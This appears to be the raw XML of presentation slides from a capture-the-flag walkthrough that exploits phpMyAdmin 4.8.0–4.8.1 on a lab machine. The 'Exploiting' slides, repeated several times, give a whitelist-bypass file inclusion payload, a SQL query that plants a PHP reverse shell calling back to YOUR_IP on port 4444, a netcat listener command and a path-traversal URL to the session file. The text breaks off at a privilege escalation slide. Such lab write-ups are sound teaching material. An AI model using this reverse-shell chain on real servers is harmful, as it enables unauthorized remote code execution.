          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Summary:</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The PHP code on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> will include any file passed in as a “target” variable. It validates it by checking against a whitelist but can be bypassed by adding something from the whitelist. This makes our payload:</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index.php?target</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sql.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?/path/to/file/to/include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>What File do we want to include?</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The site goes on to mention that if you make a query on the database, it’s stored in your session. Session information is stored in /var/lib/php/sessions/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sess_SESSIONID</a:t>
            </a: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4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A94EBE0-7C57-6B40-9898-DFBD095A276D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7795081" y="412750"/>
            <a:ext cx="3302000" cy="977900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2084375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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRP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6858442" cy="6252104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>phpmyadmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The Plan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="25146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Make a query on /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>server_sql.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="544068" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select '&lt;?php $sock=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fsockopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(”YOUR_IP",4444); $proc=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proc_open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", array(0=&gt;$sock, 1=&gt;$sock, 2=&gt;$sock), $pipes);?&gt;’ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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1551497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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRP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6858442" cy="6252104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>phpmyadmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The Plan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="25146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Make a query on /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>server_sql.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="544068" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select '&lt;?php $sock=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fsockopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(”YOUR_IP",4444); $proc=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proc_open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", array(0=&gt;$sock, 1=&gt;$sock, 2=&gt;$sock), $pipes);?&gt;’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="25146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Get Session ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RightClick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspect Element &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Tab &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select an item &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies &gt;</a:t>
            </a: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94F83E50-01D2-3348-B7B4-EBFC882BE91A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7355824" y="3429000"/>
            <a:ext cx="4343807" cy="1608817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C4A5172-FF4F-344F-882D-4AB7AB8601DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9598662" y="4051300"/>
            <a:ext cx="828038" cy="31157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1155C8CF-E22A-084A-AECE-21C2F00A850B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7355824" y="3576159"/>
            <a:ext cx="828038" cy="31157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53723B57-8E63-C24C-9B98-1D85ED874AFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9598662" y="4560962"/>
            <a:ext cx="2100969" cy="42421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91226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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRP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5231958" y="605896"/>
            <a:ext cx="6858442" cy="6671204"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>phpmyadmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The Plan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="25146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Make a query on /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>server_sql.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="544068" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select '&lt;?php $sock=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fsockopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(”YOUR_IP",4444); $proc=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proc_open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", array(0=&gt;$sock, 1=&gt;$sock, 2=&gt;$sock), $pipes);?&gt;’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="25146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Get Session ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RightClick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspect Element &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Tab &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select an item &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="25146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Start listener and visit site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="54406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nc</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nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="54406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Visit http://10.10.10.143/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>phpmyadmin</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index.php?target</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sql.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?../../../../../var/lib/php/sessions/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sess_ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-YOU-COPIED</a:t>
            </a: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a:p>
            <a:pPr lvl="1"/>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94F83E50-01D2-3348-B7B4-EBFC882BE91A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7355824" y="3429000"/>
            <a:ext cx="4343807" cy="1608817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C4A5172-FF4F-344F-882D-4AB7AB8601DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9598662" y="4051300"/>
            <a:ext cx="828038" cy="31157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1155C8CF-E22A-084A-AECE-21C2F00A850B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7355824" y="3576159"/>
            <a:ext cx="828038" cy="31157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53723B57-8E63-C24C-9B98-1D85ED874AFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9598662" y="4560962"/>
            <a:ext cx="2100969" cy="42421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01293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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv Esc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRP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www-data -&gt; Pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="34290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Start with Linux Enumeration</a:t>
            </a:r>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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
